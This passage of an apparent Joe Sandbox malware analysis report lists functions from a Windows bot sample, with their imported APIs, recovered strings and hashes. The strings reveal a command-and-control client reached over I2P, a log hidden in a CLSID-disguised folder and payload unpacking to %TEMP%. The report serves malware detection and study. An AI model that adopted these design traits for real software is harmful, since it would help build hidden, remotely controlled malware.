String ID: $ $(key != NULL)$(root != NULL)$(value != NULL)$(value_sz != NULL)$C:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$[D] (%s) -> Done(root=0x%p,key=%s,param=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$registry_get_value
API String ID: 1980715187-3890537267
Opcode ID: 67cfbe663f343971c6fe7e85701b994eac7cc84ec6e756fd20b4d9e1f579e884
Instruction ID: 3b864f7f0a7b44b38e01e7fa985efcbfa4307e9bd24ce54776d4e14f2aacf50e
Opcode Fuzzy Hash: 67cfbe663f343971c6fe7e85701b994eac7cc84ec6e756fd20b4d9e1f579e884
Instruction Fuzzy Hash: 0FA11E20D0CF4B85FF209786AD4037B265CAF047A8ED411B2DA5E466B1EE6DF985A703

Function 00007FFE0E165192 Relevance: 33.5, APIs: 3, Strings: 16, Instructions: 246registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32 ref: 00007FFE0E1651EC
RegQueryValueExA.ADVAPI32 ref: 00007FFE0E165334

Part of subcall function 00007FFE0E16C852: fwrite.MSVCRT ref: 00007FFE0E16C8FE
Part of subcall function 00007FFE0E16C852: fflush.MSVCRT ref: 00007FFE0E16C90A

Strings

(value != NULL), xrefs: 00007FFE0E1652BF
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE0E1654AD
[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu), xrefs: 00007FFE0E16520E
P, xrefs: 00007FFE0E1653E8
C:/Projects/rdp/bot/codebase/registry.c, xrefs: 00007FFE0E165252, 00007FFE0E165285, 00007FFE0E1652B8, 00007FFE0E1652EB
[D] (%s) -> Done(root=0x%p,key=%s,param=%s), xrefs: 00007FFE0E16562B
(key != NULL), xrefs: 00007FFE0E16528C
(root != NULL), xrefs: 00007FFE0E165259
[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu), xrefs: 00007FFE0E165362
, xrefs: 00007FFE0E16536E
, xrefs: 00007FFE0E165377
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE0E165267, 00007FFE0E16529A, 00007FFE0E1652CD, 00007FFE0E165300
NULL, xrefs: 00007FFE0E16538E, 00007FFE0E16563C, 00007FFE0E165648
(value_sz != NULL), xrefs: 00007FFE0E1652F2
registry_get_value, xrefs: 00007FFE0E165207, 00007FFE0E165260, 00007FFE0E165293, 00007FFE0E1652C6, 00007FFE0E1652F9, 00007FFE0E16535B, 00007FFE0E1654A6, 00007FFE0E165624
P, xrefs: 00007FFE0E1653DF

Memory Dump Source

Source File: 00000017.00000002.2982412926.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true

Associated: 00000017.00000002.2982385098.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2982444726.00007FFE0E176000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2982471694.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2982500156.00007FFE0E183000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2982529491.00007FFE0E184000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe0e160000_main.jbxd

Similarity

API ID: OpenQueryValuefflushfwrite
String ID: $ $(key != NULL)$(root != NULL)$(value != NULL)$(value_sz != NULL)$C:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$[D] (%s) -> Done(root=0x%p,key=%s,param=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$registry_get_value
API String ID: 1980715187-3890537267
Opcode ID: 66ec8f2da1124808f01955d1185ca8855145a8341d6aaae69ba7b0c838185223
Instruction ID: 24626e7d7beb5001e1f70c89204de26ab9039bfde02e98cafc13826f60c1dc26
Opcode Fuzzy Hash: 66ec8f2da1124808f01955d1185ca8855145a8341d6aaae69ba7b0c838185223
Instruction Fuzzy Hash: 87A14061D0C74B81FA709B00E9443B96266AF00B4AF540533D9DE07AF7FEADE985D342

Function 00007FFE0EB43382 Relevance: 33.5, APIs: 3, Strings: 16, Instructions: 246registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32 ref: 00007FFE0EB433DC
RegQueryValueExA.ADVAPI32 ref: 00007FFE0EB43524

Part of subcall function 00007FFE0EB49DC2: fwrite.MSVCRT ref: 00007FFE0EB49E6E
Part of subcall function 00007FFE0EB49DC2: fflush.MSVCRT ref: 00007FFE0EB49E7A

Strings

[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE0EB43457, 00007FFE0EB4348A, 00007FFE0EB434BD, 00007FFE0EB434F0
[D] (%s) -> Done(root=0x%p,key=%s,param=%s), xrefs: 00007FFE0EB4381B
P, xrefs: 00007FFE0EB435CF
(value_sz != NULL), xrefs: 00007FFE0EB434E2
NULL, xrefs: 00007FFE0EB4357E, 00007FFE0EB4382C, 00007FFE0EB43838
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE0EB4369D
(value != NULL), xrefs: 00007FFE0EB434AF
[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu), xrefs: 00007FFE0EB43552
, xrefs: 00007FFE0EB4355E
registry_get_value, xrefs: 00007FFE0EB433F7, 00007FFE0EB43450, 00007FFE0EB43483, 00007FFE0EB434B6, 00007FFE0EB434E9, 00007FFE0EB4354B, 00007FFE0EB43696, 00007FFE0EB43814
[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu), xrefs: 00007FFE0EB433FE
P, xrefs: 00007FFE0EB435D8
(key != NULL), xrefs: 00007FFE0EB4347C
(root != NULL), xrefs: 00007FFE0EB43449
C:/Projects/rdp/bot/codebase/registry.c, xrefs: 00007FFE0EB43442, 00007FFE0EB43475, 00007FFE0EB434A8, 00007FFE0EB434DB
, xrefs: 00007FFE0EB43567

Memory Dump Source

Source File: 00000017.00000002.2982612085.00007FFE0EB41000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE0EB40000, based on PE: true

Associated: 00000017.00000002.2982583990.00007FFE0EB40000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2982645078.00007FFE0EB53000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2982679325.00007FFE0EB5C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2982718497.00007FFE0EB5F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2982747189.00007FFE0EB60000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe0eb40000_main.jbxd

Similarity

API ID: OpenQueryValuefflushfwrite
String ID: $ $(key != NULL)$(root != NULL)$(value != NULL)$(value_sz != NULL)$C:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$[D] (%s) -> Done(root=0x%p,key=%s,param=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$registry_get_value
API String ID: 1980715187-3890537267
Opcode ID: 5cf81db9f808f48a717ee55fb56b084ce3dae9e65be7d2129b8af3ede309d251
Instruction ID: 002258ca19b8236890ad9813d6531bbab5073eb994503a5f0a2bd5543ef8730f
Opcode Fuzzy Hash: 5cf81db9f808f48a717ee55fb56b084ce3dae9e65be7d2129b8af3ede309d251
Instruction Fuzzy Hash: FFA15EA1D0C74B91F671AF84A8403792290EF55744F584132DAEF067F5EE6DEA85CF02

Function 00007FFE126DC63D Relevance: 33.4, APIs: 2, Strings: 17, Instructions: 180threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32 ref: 00007FFE126DC852
GetLastError.KERNEL32 ref: 00007FFE126DC8B3

Strings

server_timeo, xrefs: 00007FFE126DC6F3
~, xrefs: 00007FFE126DC900
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFE126DC80C
server_host, xrefs: 00007FFE126DC674
[E] (%s) -> CreateThread(%s) failed(gle=%lu), xrefs: 00007FFE126DC8CC
[I] (%s) -> %s, xrefs: 00007FFE126DC8A2
, xrefs: 00007FFE126DC8D8
P, xrefs: 00007FFE126DC905
[I] (%s) -> CreateThread(%s) done, xrefs: 00007FFE126DC872
cnccli, xrefs: 00007FFE126DC67B, 00007FFE126DC6B9, 00007FFE126DC6FA, 00007FFE126DC73B, 00007FFE126DC77C, 00007FFE126DC7AF
routine_rx, xrefs: 00007FFE126DC864, 00007FFE126DC8BE
i2p_addr, xrefs: 00007FFE126DC7A8
server_port, xrefs: 00007FFE126DC6B2
i2p_try_num, xrefs: 00007FFE126DC734
Done, xrefs: 00007FFE126DC894
cnc_init, xrefs: 00007FFE126DC805, 00007FFE126DC86B, 00007FFE126DC89B, 00007FFE126DC8C5
i2p_sam3_timeo, xrefs: 00007FFE126DC775

Memory Dump Source

Source File: 00000017.00000002.2983236501.00007FFE126D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE126D0000, based on PE: true

Associated: 00000017.00000002.2983191896.00007FFE126D0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983276516.00007FFE126E3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983306621.00007FFE126E4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983340803.00007FFE126ED000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983376197.00007FFE126F0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983406046.00007FFE126F1000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983443586.00007FFE126F4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe126d0000_main.jbxd

Similarity

API ID: CreateErrorLastThread
String ID: $Done$P$[E] (%s) -> CreateThread(%s) failed(gle=%lu)$[E] (%s) -> Failed(err=%08x)$[I] (%s) -> %s$[I] (%s) -> CreateThread(%s) done$cnc_init$cnccli$i2p_addr$i2p_sam3_timeo$i2p_try_num$routine_rx$server_host$server_port$server_timeo$~
API String ID: 1689873465-2891999747
Opcode ID: e903d144b2f44c2a2033eeb375ea37c3a0dd4a55feb76df5ed730789ba93a5fb
Instruction ID: b912d05165c13265801ac6f4ac3107c28b83f0e97c3a4b7d638854fcd565f2da
Opcode Fuzzy Hash: e903d144b2f44c2a2033eeb375ea37c3a0dd4a55feb76df5ed730789ba93a5fb
Instruction Fuzzy Hash: 09911964A0DF8F96FB60DB16AC847B82294AF14778F5002B1C99D462F9EFECE945C341

Function 00007FF6EF654D2B Relevance: 33.4, APIs: 9, Strings: 10, Instructions: 133fileCOMMON

Download Yara Rule

APIs

fopen.MSVCRT ref: 00007FF6EF654D53
fclose.MSVCRT ref: 00007FF6EF654D85
_errno.MSVCRT ref: 00007FF6EF654E3F
_errno.MSVCRT ref: 00007FF6EF654E60
fwrite.MSVCRT ref: 00007FF6EF654ED4

Strings

NULL, xrefs: 00007FF6EF654F8A, 00007FF6EF654F96
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF6EF654DF2, 00007FF6EF654E22
(mode != NULL), xrefs: 00007FF6EF654E14
(path != NULL), xrefs: 00007FF6EF654DE4
fs_file_write, xrefs: 00007FF6EF654DB5, 00007FF6EF654DEB, 00007FF6EF654E1B, 00007FF6EF654E4D, 00007FF6EF654EFD, 00007FF6EF654FAD
[E] (%s) -> fwrite failed(path=%s,mode=%s,errno=%d), xrefs: 00007FF6EF654F04
[E] (%s) -> fopen failed(path=%s,mode=%s,errno=%d), xrefs: 00007FF6EF654E54
[E] (%s) -> Failed(path=%s,mode=%s,err=%08x), xrefs: 00007FF6EF654DBC
[I] (%s) -> Done(path=%s,mode=%s,buf_sz=%llu), xrefs: 00007FF6EF654FB4
C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF6EF654DDD, 00007FF6EF654E0D

Memory Dump Source

Source File: 00000017.00000002.2979442400.00007FF6EF651000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6EF650000, based on PE: true

Associated: 00000017.00000002.2979419222.00007FF6EF650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979465592.00007FF6EF660000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979493170.00007FF6EF668000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979493170.00007FF6EF66A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979544533.00007FF6EF66E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff6ef650000_main.jbxd

Similarity

API ID: _errno$fclosefopenfwrite
String ID: (mode != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,mode=%s,err=%08x)$[E] (%s) -> fopen failed(path=%s,mode=%s,errno=%d)$[E] (%s) -> fwrite failed(path=%s,mode=%s,errno=%d)$[I] (%s) -> Done(path=%s,mode=%s,buf_sz=%llu)$fs_file_write
API String ID: 608220805-544371937
Opcode ID: 0dce1079dbfb5dc565595f50d15f60d1d2a5a1bebb43830eefa37ed7cc94c446
Instruction ID: 0a9449825ce955904766144e1e0fe1256b9ee181fb71d3e12cd5c65de765c5b9
Opcode Fuzzy Hash: 0dce1079dbfb5dc565595f50d15f60d1d2a5a1bebb43830eefa37ed7cc94c446
Instruction Fuzzy Hash: EE51B423A1864383FA109B55D9503F42369AF54B84F498A36E90DE7692DF3EF502F30A

Function 00007FFE126D328E Relevance: 31.7, APIs: 9, Strings: 9, Instructions: 177stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FFE126D32AD
CreateDirectoryA.KERNEL32 ref: 00007FFE126D32CF
GetLastError.KERNEL32 ref: 00007FFE126D3320
strcpy.MSVCRT ref: 00007FFE126D3371
strlen.MSVCRT ref: 00007FFE126D3379
strlen.MSVCRT ref: 00007FFE126D3395
strlen.MSVCRT ref: 00007FFE126D33A6
CreateDirectoryA.KERNEL32 ref: 00007FFE126D3417
GetLastError.KERNEL32 ref: 00007FFE126D3421

Strings

NULL, xrefs: 00007FFE126D3547
[E] (%s) -> Failed(path=%s,recursive=%d,err=%08x), xrefs: 00007FFE126D34F6
C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FFE126D32F0
[I] (%s) -> Done(path=%s,recursive=%d), xrefs: 00007FFE126D355D
(path != NULL), xrefs: 00007FFE126D32F7
[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,gle=%lu), xrefs: 00007FFE126D3339
[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,ptr=%s,gle=%lu), xrefs: 00007FFE126D33D0
fs_dir_create, xrefs: 00007FFE126D32FE, 00007FFE126D3332, 00007FFE126D33C9, 00007FFE126D34EF, 00007FFE126D3556
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE126D3305

Memory Dump Source

Source File: 00000017.00000002.2983236501.00007FFE126D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE126D0000, based on PE: true

Associated: 00000017.00000002.2983191896.00007FFE126D0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983276516.00007FFE126E3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983306621.00007FFE126E4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983340803.00007FFE126ED000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983376197.00007FFE126F0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983406046.00007FFE126F1000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983443586.00007FFE126F4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe126d0000_main.jbxd

Similarity

API ID: strlen$CreateDirectoryErrorLast$strcpy
String ID: (path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,gle=%lu)$[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,ptr=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,recursive=%d,err=%08x)$[I] (%s) -> Done(path=%s,recursive=%d)$fs_dir_create
API String ID: 1104438493-1059260517
Opcode ID: 35bc9f8dbae694f15c65205d47588c8a2ad6936f040b79d3d06f2a2b93be7b00
Instruction ID: 2a40d6480c2cb666d58c0c512652aadbb6a60efee82d82274860f3f3b56cab3f
Opcode Fuzzy Hash: 35bc9f8dbae694f15c65205d47588c8a2ad6936f040b79d3d06f2a2b93be7b00
Instruction Fuzzy Hash: 7D71AC21A0CE8F87FB619B17EC407B91241AF88774F5501B2D98E472F5EEECE8598B01

Function 00007FFE0EB45E9E Relevance: 31.7, APIs: 9, Strings: 9, Instructions: 177stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FFE0EB45EBD
CreateDirectoryA.KERNEL32 ref: 00007FFE0EB45EDF
GetLastError.KERNEL32 ref: 00007FFE0EB45F30
strcpy.MSVCRT ref: 00007FFE0EB45F81
strlen.MSVCRT ref: 00007FFE0EB45F89
strlen.MSVCRT ref: 00007FFE0EB45FA5
strlen.MSVCRT ref: 00007FFE0EB45FB6
CreateDirectoryA.KERNEL32 ref: 00007FFE0EB46027
GetLastError.KERNEL32 ref: 00007FFE0EB46031

Strings

[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,ptr=%s,gle=%lu), xrefs: 00007FFE0EB45FE0
fs_dir_create, xrefs: 00007FFE0EB45F0E, 00007FFE0EB45F42, 00007FFE0EB45FD9, 00007FFE0EB460FF, 00007FFE0EB46166
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE0EB45F15
[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,gle=%lu), xrefs: 00007FFE0EB45F49
[I] (%s) -> Done(path=%s,recursive=%d), xrefs: 00007FFE0EB4616D
(path != NULL), xrefs: 00007FFE0EB45F07
[E] (%s) -> Failed(path=%s,recursive=%d,err=%08x), xrefs: 00007FFE0EB46106
NULL, xrefs: 00007FFE0EB46157
C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FFE0EB45F00

Memory Dump Source

Source File: 00000017.00000002.2982612085.00007FFE0EB41000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE0EB40000, based on PE: true

Associated: 00000017.00000002.2982583990.00007FFE0EB40000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2982645078.00007FFE0EB53000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2982679325.00007FFE0EB5C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2982718497.00007FFE0EB5F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2982747189.00007FFE0EB60000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe0eb40000_main.jbxd

Similarity

API ID: strlen$CreateDirectoryErrorLast$strcpy
String ID: (path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,gle=%lu)$[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,ptr=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,recursive=%d,err=%08x)$[I] (%s) -> Done(path=%s,recursive=%d)$fs_dir_create
API String ID: 1104438493-1059260517
Opcode ID: 74d8aff9c1f85ae7413d121a3eeae0da39c630085a9af3950b26d4bf2913322c
Instruction ID: 10e47e573164ddd08be9b59b9bc6ed0cf0b0213e4fda7219fcf0cc2ad235bee0
Opcode Fuzzy Hash: 74d8aff9c1f85ae7413d121a3eeae0da39c630085a9af3950b26d4bf2913322c
Instruction Fuzzy Hash: 6E715BA2B0D74782FB325F14E8807B95351EB89785F541132DACE467FADE3DE8858B02

Function 00007FF6EF65309C Relevance: 31.6, APIs: 8, Strings: 10, Instructions: 139stringfileCOMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00007FF6EF6530BC
GetLastError.KERNEL32 ref: 00007FF6EF6531ED

Part of subcall function 00007FF6EF651FD0: GetModuleHandleExA.KERNEL32(?,?,?,?,?,?,00007FF6EF65162F), ref: 00007FF6EF651FEE

strlen.MSVCRT ref: 00007FF6EF65310E
strlen.MSVCRT ref: 00007FF6EF65312A
_mbscat.MSVCRT ref: 00007FF6EF653145
strlen.MSVCRT ref: 00007FF6EF65314D
strlen.MSVCRT ref: 00007FF6EF653162
fopen.MSVCRT ref: 00007FF6EF653185

Strings

[I] (%s) -> Log open success(flog_path=%s), xrefs: 00007FF6EF6531B2
Done, xrefs: 00007FF6EF65332A
debug_init, xrefs: 00007FF6EF6531AB, 00007FF6EF6531D0, 00007FF6EF6531F8, 00007FF6EF6532BD, 00007FF6EF653331
[E] (%s) -> Log open failed(flog_path=%s), xrefs: 00007FF6EF6532C4
service, xrefs: 00007FF6EF65309E
[E] (%s) -> Failed(err=%08x), xrefs: 00007FF6EF6531D7
[I] (%s) -> %s, xrefs: 00007FF6EF653338
main.log, xrefs: 00007FF6EF65316A
[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu), xrefs: 00007FF6EF6531FF
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.log, xrefs: 00007FF6EF6530EE, 00007FF6EF653104, 00007FF6EF65313B, 00007FF6EF653158, 00007FF6EF6531A4

Memory Dump Source

Source File: 00000017.00000002.2979442400.00007FF6EF651000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6EF650000, based on PE: true

Associated: 00000017.00000002.2979419222.00007FF6EF650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979465592.00007FF6EF660000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979493170.00007FF6EF668000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979493170.00007FF6EF66A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979544533.00007FF6EF66E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff6ef650000_main.jbxd

Similarity

API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpin_mbscatfopen
String ID: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.log$Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$debug_init$main.log$service
API String ID: 3216678114-1460613360
Opcode ID: f6ce7aea18c6699f1e2cb8aaa6c441773b6b84546cb352a08ff0f9f4e49d6c0f
Instruction ID: 353e241d1e425f8a916312a54c09d59d99698174658e6538bc43449ffec3e607
Opcode Fuzzy Hash: f6ce7aea18c6699f1e2cb8aaa6c441773b6b84546cb352a08ff0f9f4e49d6c0f
Instruction Fuzzy Hash: 8B517113B1C61793FE205764A9813B8235AAF44B84F450932E50DE62E3DE6FB946F30B

Function 00007FF6EF657750 Relevance: 29.9, APIs: 6, Strings: 11, Instructions: 193stringCOMMON

Download Yara Rule

APIs

_mbscat.MSVCRT ref: 00007FF6EF6578D0
strlen.MSVCRT ref: 00007FF6EF65798E
_mbscpy.MSVCRT ref: 00007FF6EF6579B6
_mbscpy.MSVCRT ref: 00007FF6EF657A0D
strlen.MSVCRT ref: 00007FF6EF657A15
strlen.MSVCRT ref: 00007FF6EF657A3F

Part of subcall function 00007FF6EF654FC5: fopen.MSVCRT ref: 00007FF6EF65500A
Part of subcall function 00007FF6EF654FC5: fseek.MSVCRT ref: 00007FF6EF655029
Part of subcall function 00007FF6EF654FC5: _errno.MSVCRT ref: 00007FF6EF65503D
Part of subcall function 00007FF6EF654FC5: _errno.MSVCRT ref: 00007FF6EF655058

Strings

(package != NULL), xrefs: 00007FF6EF657801
(target != NULL), xrefs: 00007FF6EF657831
[I] (%s) -> Done(package=%s,target=%s), xrefs: 00007FF6EF657A8D
C:/Projects/rdp/bot/codebase/package.c, xrefs: 00007FF6EF6577FA, 00007FF6EF65782A
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF6EF65780F, 00007FF6EF65783F
[E] (%s) -> Entry unpack failed(package=%s,target=%s,pkg_ent=%s,pkg_ent_sz=%u,err=%08x), xrefs: 00007FF6EF657920
[I] (%s) -> Entry unpack done(package=%s,target=%s,pkg_ent=%s,pkg_ent_sz=%u), xrefs: 00007FF6EF657A67
[E] (%s) -> Failed(package=%s,target=%s,err=%08x), xrefs: 00007FF6EF6577D0
%TEMP%, xrefs: 00007FF6EF6578B2
package_unpack, xrefs: 00007FF6EF6577C9, 00007FF6EF657808, 00007FF6EF657838, 00007FF6EF657919, 00007FF6EF657A60, 00007FF6EF657A86
NULL, xrefs: 00007FF6EF657A9E, 00007FF6EF657AAA

Memory Dump Source

Source File: 00000017.00000002.2979442400.00007FF6EF651000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6EF650000, based on PE: true

Associated: 00000017.00000002.2979419222.00007FF6EF650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979465592.00007FF6EF660000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979493170.00007FF6EF668000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979493170.00007FF6EF66A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979544533.00007FF6EF66E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff6ef650000_main.jbxd

Similarity

API ID: strlen$_errno_mbscpy$_mbscatfopenfseek
String ID: %TEMP%$(package != NULL)$(target != NULL)$C:/Projects/rdp/bot/codebase/package.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Entry unpack failed(package=%s,target=%s,pkg_ent=%s,pkg_ent_sz=%u,err=%08x)$[E] (%s) -> Failed(package=%s,target=%s,err=%08x)$[I] (%s) -> Done(package=%s,target=%s)$[I] (%s) -> Entry unpack done(package=%s,target=%s,pkg_ent=%s,pkg_ent_sz=%u)$package_unpack
API String ID: 3066828623-21863935
Opcode ID: fa4f7efa52dbeaf0bc24b1f2719f783785f4c9ad8abfb8458d9086107e72eb43
Instruction ID: 2c0b46acd01a8987d8862fd3c8fac14caa7903253d69015947975bef9e5ce16c
Opcode Fuzzy Hash: fa4f7efa52dbeaf0bc24b1f2719f783785f4c9ad8abfb8458d9086107e72eb43
Instruction Fuzzy Hash: 9C81A063A0C64793FB109F14E8403BA6768FB44384F844531EA4DEB68ADF7EE509E709

Function 00007FF6EF6516E3 Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 179stringmemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6EF651FD0: GetModuleHandleExA.KERNEL32(?,?,?,?,?,?,00007FF6EF65162F), ref: 00007FF6EF651FEE

strlen.MSVCRT ref: 00007FF6EF651758
strlen.MSVCRT ref: 00007FF6EF65177A
_mbscpy.MSVCRT ref: 00007FF6EF651796
strlen.MSVCRT ref: 00007FF6EF65179E
strlen.MSVCRT ref: 00007FF6EF6517B5
FreeLibrary.KERNEL32 ref: 00007FF6EF6517F1
GetProcessHeap.KERNEL32 ref: 00007FF6EF6518AD
HeapAlloc.KERNEL32 ref: 00007FF6EF6518C1
_mbscpy.MSVCRT ref: 00007FF6EF6518D6

Strings

unit_init, xrefs: 00007FF6EF65185F
[E] (%s) -> Failed(name=%s,err=%08x), xrefs: 00007FF6EF65196E
units_init, xrefs: 00007FF6EF65189A, 00007FF6EF651967, 00007FF6EF6519A8
unit_cleanup, xrefs: 00007FF6EF651876
mem_alloc, xrefs: 00007FF6EF651908
[I] (%s) -> Loaded(f_path=%s), xrefs: 00007FF6EF6518A1
[I] (%s) -> Done(name=%s), xrefs: 00007FF6EF6519AF
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FF6EF65190F

Memory Dump Source

